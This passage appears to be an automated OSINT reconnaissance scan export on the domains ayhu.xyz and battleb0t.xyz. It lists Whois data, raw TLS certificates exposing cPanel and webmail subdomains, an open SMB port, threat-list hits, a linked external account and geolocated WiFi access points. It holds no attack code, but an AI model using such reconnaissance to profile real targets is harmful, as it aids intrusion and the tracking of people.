date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
| githubusercontent.com |
| 2023-05-12 02:54:13 | Web Content Type | No | Web Spider | 0 | 0 | 3 | 0 | None | text/css | https://ayhu.xyz/cdn-cgi/styles/challenges.css |
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | mail.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:
fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:
b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:
02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:
e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:
41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:
b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:
d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:
38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:
39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:
72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:
f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:
b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:
4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:
71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:
ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:
29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:
f8:db
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 14 04:53:54.573 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D2:4D:1F:4C:53:A2:2C:16:48:36:E0:
E3:59:95:10:4D:AC:DA:52:1A:46:2E:19:E7:DA:3A:94:
30:B2:B6:AF:0D:02:21:00:B0:C6:A1:4B:9B:FE:4E:59:
8A:FC:46:1B:75:55:34:A2:8C:0A:51:5A:D3:3F:C3:63:
FB:4F:E2:E6:C3:EE:2C:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 14 04:53:55.080 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:19:ED:EC:3B:A7:32:A8:30:D7:4E:2F:1A:
02:02:BB:D6:DD:30:69:59:5A:E6:97:33:2E:BA:E1:81:
BB:CB:99:00:02:21:00:D4:02:BD:53:9C:06:85:84:2D:
D9:33:CD:60:59:DF:DC:44:B2:4C:A9:FF:8D:9F:75:90:
F0:18:EF:92:21:63:F2
Signature Algorithm: sha256WithRSAEncryption
47:e5:47:8a:5f:84:37:c0:02:97:35:aa:f2:b0:78:40:e7:a7:
4b:75:22:0b:a5:fb:81:51:db:7f:48:05:05:cf:56:dd:69:5f:
ff:a9:81:35:df:0e:37:63:bc:cf:e9:04:35:2e:93:0d:cb:ec:
3b:29:06:9b:cc:f9:88:91:0c:0c:6c:50:03:1e:f2:37:b0:d2:
3a:51:bd:ea:2e:d4:c1:14:23:12:fa:23:c6:0b:23:6d:59:64:
37:c1:19:f0:fc:0a:70:3f:3e:a2:ba:a9:1b:1a:a0:9a:c0:a8:
92:f0:f6:cb:41:69:32:ab:f7:f7:32:b0:fb:af:db:e0:fa:c9:
05:b6:49:21:d5:48:07:23:f4:14:1e:e6:16:03:17:40:fa:84:
7e:34:ed:67:8d:2b:63:9c:57:50:bd:40:57:13:4f:56:ea:0d:
6b:4e:d6:08:40:d4:cb:ee:ab:df:5c:7f:66:51:e8:c5:80:2c:
36:f3:57:45:b8:4e:cf:13:55:68:05:43:37:5d:53:06:76:78:
12:7a:43:6a:d4:09:c5:e2:b2:a3:69:4f:a7:d9:91:58:86:8d:
48:37:1c:60:ed:eb:48:b9:bd:5d:b1:4d:ac:af:9b:5b:a2:ab:
a6:a4:49:fb:f3:b8:d3:3f:2c:d0:72:37:b1:a4:ae:8b:5e:82:
84:78:32:a1
|
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | eminent819 (Net ID: 00:14:5C:87:8C:58) | 50.8897, 6.0563 |
| 2023-05-12 03:00:56 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.88): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 2WIRE681 (Net ID: 00:02:2D:68:92:B3) | 37.7642, -122.3993 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | tripadvisor (Category: social)
https://www.tripadvisor.com/Profile/Altpapier | Altpapier |
| 2023-05-12 03:24:33 | Malicious Affiliate | Yes | VXVault.net | 0 | 1 | 4 | 0 | None | VXVault Malicious URL List [cdn-185-199-108-154.github.com]
http://vxvault.net/URL_List.php | cdn-185-199-108-154.github.com |
| 2023-05-12 02:53:56 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:b3:d3:7f:a8:50:41:aa:70:38:c6:ab:16:2e:24:50:f9:66
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 29 13:55:16 2022 GMT
Not After : Mar 29 13:55:15 2023 GMT
Subject: CN=tiktok.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:tiktok.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
3c:48:04:ac:20:99:db:ca:ca:6a:cc:70:e1:43:3e:81:e0:75:
d7:27:b2:3e:bf:0a:2c:b9:85:20:f8:d1:95:d7:8e:f6:e5:e7:
34:bf:dd:34:59:cd:80:f7:bc:54:a0:98:88:5b:c3:c9:31:8c:
d5:fb:f3:f4:99:19:e3:f7:7b:0e:cf:b8:fd:2e:98:1e:df:5e:
bd:32:3e:95:6e:85:fd:3c:39:51:1e:b7:ca:45:bb:af:6c:d9:
7d:bb:b2:5a:16:0a:ba:b6:2c:18:38:cf:10:14:91:d1:4e:1e:
9e:4a:61:8d:0a:4f:5a:cd:71:50:15:21:8b:cd:1e:13:69:3b:
32:8b:47:84:8b:ff:c8:9a:db:3a:ad:fc:8a:2a:31:1f:ec:36:
13:1f:de:24:59:1f:25:65:d4:e8:c7:48:dd:a5:f3:44:51:45:
44:37:47:80:9f:8c:0d:17:6e:d2:9a:8a:53:98:c4:b7:c5:92:
92:58:25:fc:e6:3b:4e:df:03:44:8a:de:9f:fe:7a:58:8e:b2:
30:ab:13:3d:69:81:47:99:7f:37:6f:80:60:8a:d3:9e:ba:df:
ab:68:1e:a3:61:1c:dd:77:2a:1c:ae:ee:b6:17:f1:05:72:d2:
ee:bb:6e:b1:5f:2b:66:a2:ce:5c:75:86:24:dc:66:4d:87:3e:
95:cd:4d:fe
| battleb0t.xyz |
| 2023-05-12 02:56:56 | Internet Name | No | DNS Resolver | 0 | 0 | 6 | 0 | None | www.ayhu.xyz | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60726fad1912')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="kO2xNaAYVVwzudN_grHGsSAbBGIYi5Rp9eWkwq8bobk-1683860063-0-AQEme0OuFvC27LD-nLe2jrmTTnxOgSGtlJ79kOqNI8O_bMBUHsCUifsyrQtE2Qw_5-G3wZLVyXKSq4HyXvLjyCiAdaCGs4Ok-COq8gyypPok4HyuqEcnabkOPj9JKzn7fzxQf8pA4avsXNbgzL5RFZ0OappR_ENyOliTj3y1usOCEfdx0Qw-4NtIYkgBrlm6HYt1w2WiYgJIzvrwK3xMFits_Ebjt14epXfZCroTuFIFxaYyyRcuJJEK3ck04c2JtRdR99xcpwbep8NMi6CNOGP-aAH4FLQSKV1p7HK0fEmUDFvoadw-7bo2EucRyXYFLEbjS7Z_OKl0Srfy1Vim3Z_jqewduFNgcp1B-ir-aT25S4z2lvk1aBpRpS3Fpn4bKR_T7uQSek6SD4z_I81JUPCm-TbJt2WcAviPmmrfZDtigYqwaDeqh4Pqa29XowW1l1nnKs6qCFhQeaLuigzJf9PhtuPk6Ts6nn4TNWVyl9ze9NMDXt3HC-u5rh_1KxQxsTY_4JhB1jT5PYZQMJUvzkddK2MPm_CtJJRmvzu4A8h1xyRkeTxVWjg5p76zqZFKP8HOoZP1u7GkAK20kE8vR-O-Gy6CmmKj5hSdpF5vjt71wmiC0vDCk1rDRhhcEkt92S6uijW7cxkpckY78siJqFhpHOVFodJroZuf7HFMwvosFXQ5NGYyHEQXXlmkoclMMK3rVJNdxiIstjCLFnDxNsbd1epvptoA5TGFKFTmHs6QjRzTIv_BIuw1QORH1eUHK9O9N-txmFD1IbLACf92gVKiwNsAAtrRtW2F06n6d9Vs_GXVIbPcV6cwsJdIquww9NaI78ELNHJNq1J_tTdFxBZavYogbVnqkQFRmkO2l5VXSM6E9dcoOwi5q4qHSrZmlxJHiqDY-PKE8PDBSk8akurNHoBfBjtw2_a1RfC_lu8B7yXfZ1SNiql9epxt9-xA01ZEs-JXEIWKB7DVUehYb7RiTKZ_trIoGgh7Q6yEfeLCDTtC1yC2iiOVhPkX_h4Qfaf7LfPKruh9cjrbe0r7qMb0h8bIRy1fsQXVXXjhWHUJzLPbbOWh7F_0GW3qFusmjdR_P6sJL-gXtd5koZkzn6EK_YdKJO6jY9uPxr4sRnkK0ioS_0VfK7kQax3cDEA5YcxYvkmmBl4DMVhT7ISnmS5G8dSMhHOdJpbJMK5G9qQm8E9Nux-WgwCPgj6TkAmQMz1NenXnJJdqz-irhHABa_tynmZ1IPtBtnIPWbu4Mgp5VyNXvvUpfdGX7V6s-SjMtH9NRG3i4YZDcDp72B0EVaiT4n2jNeEilDlbVLw8k42_nwTD7Pw7hKXZpTyQQZntWW5wgIly7x0dOOWeJl6TsZIiDLpQjNv-mLX_xQzZHdw5kii58Ccy2XJ4npuVEuBraZJ9n6B2-5AwWyV3Qr3DTuk5PmfcIxKTr_u7HsbpdFR4FKp9wurJ9rvdDIpbL_yKOtyqM9yLjxeOpIdNG7zFw8AT7XqbUfz26ewFlzRX_Cc5FOV6ATYROS3OVpko2KV-NVpYQTJgT-fYvExK0W6Ze5BMg7wpM4RSZGt0EBF4MTRkHZYYHYqVG2Gs4Dr0KphCmDsWmTYs-Wp4YmyX8zHXt6eDU7SHKTxfT3pFaOqsKIwmwk1FnA5ZOhkDp5FB4KDNaO4UI8hC2NqGaVRdddker5xFPIyxy6_xtT-933_JQEm4Yo3p33SKpnr5oZLDUmiFpcGiocX8E23z9qF6KzqiLjSYYuEdSQjfT3AOVajEAM3LV2cJ-Yfb6qV1mYvKIEbYataggM_S7XSDOMFwSxuBJJhFB_YuSQY42F1bw3h-Wr_txcqos6CYojszcuJZzN7ZQwVv-pfKRrZP1vW37Ji7qXYRsXGXizVLTDb80myaduEuuPiE3j_iEUTMQHyX7FS77GwsNXMOnK-SOX4LESTyuge5gQCwNBG5LYbWqG1phc6ZBmjChX4XXPYEWTd6pqzDCahUeE-UBjC440QhIoggi4SFzrJT424_2pz3I1Z7K9v14oR0ixYp8X0YQSjX1TvMb1hvE05cdAoJpi9QPGYD511Yvrjtr2-nQRWT9vJBLGPT61xgS5JvfKWkR5mzvNMNLXnN-QaI-YMwAUvPR8sObbMc6Js74f0zl0__XqC1L4ZGx1B6W2mPRUMY1Lrg2rh8ki2L2eiGI4MSaqbVecE9vJyl6XPRcjgNKIcsC-zohWzf7sSDfofcLJcUO1xeUIJMC_3B3JBlhmMy_ukD9DKdx40muRRW18iGtfkoFnEyb5ylZEa9Cy6RH0tiulb9zDYu9lBPk43UYKuS0gITgFj7t6HoYRbYh8Mhdn_KQTmpy5fsQY55ZC7EUgiiqGZ2kxox4gPzr-qiw2zxNU0kuoof8T7V06bM_gPceZS49qqZ0qEgovgoUQEY1PrObCR2N_zXcey5RpH4biNXy5X3XHfa8DJrozVWuJVN7xKblnML0zEboEJxIy0gm8PmeTSLtq0S2uPc6VyK0a0Z4v1q4hj82ek">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '64193',
cRay: '7c5f60726fad1912',
cHash: '710742417ab72e7',
cUPMDTk: "\/?__cf_chl_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'EHiPHm0Nl3GyThu9m1wbXjiHVtOqC3bOZB5NH6FZ4WpN/ont8bhxVwykMxIfoGSCjD8SpsL131biQUzVmplSkmz36+Rbm6LpKDPgFi1SZ6sdv468aKRPGhyFreJfGyRxilqUy5qO2EhnuYwrJjSxEU6DGEUFnqpvxw46fNgsaBRKOJ+bUVrPyznWm3WWDmCZ5I4ByfgFEH/V+llAilan1spVCzgSbbNaZnK7v2zKybgKpcf37StU8tcqkL0luzxFnWpTYEMJIRNh3502IKGm2GeIGVQUP6IIgH3pam7apk2jk/MVIAQ55tOJt6IZrTr1Qcj4biXsY3FIPVNAc0sCXlUyI683VVNAnv7kxmJ0SLq0ELP7CILJKsuRkOc2+1w90SBLDbAqCH/GEPeh86EVOXxwcNFZqRIljefJbQxhuH4JevbkysQYXa6LkLXsD5QKQE0OPjJQvEC2SmVFUO8wuJE/HZ29m2obUyVypKKxYzEuV7pCj1nVwt32aW4bF0deBcy4/M4CeO4Epb9dj4xmVGUtKMp/g+OZaEvQnjUgBRlg57NTUuvDL1hFtL478NEE',
t: 'MTY4Mzg2MDA2My4xMDMwMDA=',
m: 'Eo2K0b1/t+yBaonJiJkwi8mL0OupY28MY+kXkSexuGA=',
i1: 'WdeoMAtxqx1knlB7AiLouA==',
i2: 'PLvf+P/FOv6sb4wuUck9Eg==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f60726fad1912');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f60726fad1912';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:B9:5F:B7) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:15:36 | Physical Location | No | ipstack | 0 | 0 | 2 | 0 | None | Colombia | 188.114.97.1 |
| 2023-05-12 02:53:56 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 54113 | 2606:50c0:8001::153 |
| 2023-05-12 02:50:30 | Legal Entity Identifier | No | GLEIF | 0 | 0 | 3 | 0 | None | 54930014QNWWH8OAC930 | GoDaddy.com, LLC |
| 2023-05-12 02:54:12 | Linked URL - Internal | No | Web Spider | 0 | 0 | 1 | 0 | None | http://battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Saint Helena | scoop.sh |
| 2023-05-12 02:54:21 | HTTP Headers | No | Web Spider | 3 | 0 | 3 | 0 | None | {"transfer-encoding": "chunked", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "server": "cloudflare", "connection": "keep-alive", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:21 GMT", "x-frame-options": "SAMEORIGIN", "referrer-policy": "same-origin", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f606679610ce9-EWR"} | vscode.battleb0t.xyz |
| 2023-05-12 02:53:35 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 185.199.110.153 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 7717 7361 (Net ID: 00:00:C5:FC:FE:34) | 37.780462,-122.390564 |
| 2023-05-12 03:41:52 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 45.131.109.53:445 | 45.131.109.53 |
| 2023-05-12 02:44:10 | Co-Hosted Site | No | SSL Certificate Analyzer | 2 | 1 | 1 | 0 | None | githubusercontent.com | battleb0t.xyz |
| 2023-05-12 02:46:49 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
02:5a:61:0f:58:eb:84:f1:ad:53:ae:03:dc:a9:84:7a
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1
Validity
Not Before: Dec 21 00:00:00 2022 GMT
Not After : Jan 21 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=Netlify, Inc, CN=*.netlify.app
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:64:c3:ab:83:a1:9f:9b:f7:ff:e5:00:bf:41:ae:
cd:d1:cd:1c:5d:8d:4d:62:fb:0e:e4:90:33:13:2d:
b5:45:91:e6:7a:26:a0:5e:01:ae:25:84:fb:d5:88:
23:7e:13:7e:a9:d3:a5:de:69:2d:91:69:c3:12:86:
5a:94:02:42:28
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:0A:BC:08:29:17:8C:A5:39:6D:7A:0E:CE:33:C7:2E:B3:ED:FB:C3:7A
X509v3 Subject Key Identifier:
3E:6A:BE:6E:25:AC:12:10:AB:BE:F1:EB:A7:A9:BC:6D:88:7D:54:8F
X509v3 Subject Alternative Name:
DNS:*.netlify.app, DNS:netlify.app
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Dec 21 09:03:52.902 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:31:BA:E4:35:B8:DF:14:C3:99:B3:D0:FB:
C6:93:77:5C:5A:D1:E2:7C:62:90:83:BB:77:59:14:17:
00:CD:14:09:02:21:00:A0:89:29:6C:06:8B:80:0E:58:
FD:7C:72:66:63:BF:84:90:99:2F:F3:90:6D:39:BD:86:
6C:21:15:5D:B2:9C:A1
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Dec 21 09:03:52.857 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D2:85:6B:1A:5F:D3:6B:D9:52:36:0B:
44:9B:B7:9C:FF:8D:70:8C:F4:D1:34:69:3C:10:D4:AD:
03:93:DD:F1:A4:02:21:00:C0:7F:F8:B3:01:C9:63:4D:
D3:D5:2B:F6:46:B5:04:38:1F:2D:8A:D9:5F:C8:07:F8:
5D:FA:B6:44:79:49:3C:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 3B:53:77:75:3E:2D:B9:80:4E:8B:30:5B:06:FE:40:3B:
67:D8:4F:C3:F4:C7:BD:00:0D:2D:72:6F:E1:FA:D4:17
Timestamp : Dec 21 09:03:52.852 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:87:5E:CF:47:90:E0:B2:0D:AA:FC:5D:
58:AA:C9:7E:AE:76:49:89:1E:EB:25:CD:66:CC:A5:23:
F6:24:7A:AE:07:02:20:5E:32:A3:09:9E:48:84:4A:A9:
3B:C0:AA:53:22:AB:E0:9A:BF:4F:DB:FB:66:C2:2B:F8:
4E:E8:E8:BE:9A:FD:22
Signature Algorithm: ecdsa-with-SHA384
30:66:02:31:00:a8:8f:12:1b:fa:2f:f4:cc:aa:04:9b:b9:ea:
95:f5:30:5a:59:f6:f8:b4:4d:b6:51:7e:89:b3:c8:92:7a:7e:
80:c0:81:be:6e:38:4e:5e:5a:7d:bb:10:72:ae:d7:11:5f:02:
31:00:fc:dd:52:7b:4b:33:ad:13:21:0b:b3:8a:93:5d:fb:03:
ac:f0:f4:f6:55:46:ed:1e:45:14:60:d2:47:04:5f:56:a0:b6:
8d:b8:c7:6a:0b:fd:73:a6:07:2b:fa:b2:e2:49
| 104.196.30.220 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MGOKCEN (Net ID: 00:14:C1:2B:03:F6) | 40.2024, 29.0398 |
| 2023-05-12 02:44:06 | Domain Registrar | No | Whois | 0 | 0 | 1 | 0 | None | GoDaddy.com, LLC | ayhu.xyz |
